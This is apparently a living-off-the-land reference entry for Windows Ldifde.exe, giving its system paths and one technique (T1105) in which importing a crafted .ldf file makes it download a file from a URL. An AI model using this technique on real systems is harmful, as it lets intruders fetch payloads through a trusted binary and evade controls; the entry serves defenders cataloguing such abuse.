Ldifde.exe

type: OSBinaries
Creates, modifies, and deletes LDAP directory objects.

Full path

c:\windows\system32\ldifde.exe
c:\windows\syswow64\ldifde.exe

Commands

  1. DownloadAdministrator T1105

    Download file from Internet

    Ldifde -i -f {PATH:.ldf}

    Import specified .ldf file into LDAP. If the file contains http-based attrval-spec such as thumbnailPhoto:< http://example.org/somefile.txt, the file will be downloaded into IE temp folder.

    os: Windows Server with AD Domain Services role, Windows 10 with AD LDS role.

Detection

Resources

acknowledgement: Grzegorz Tworek @0gtweet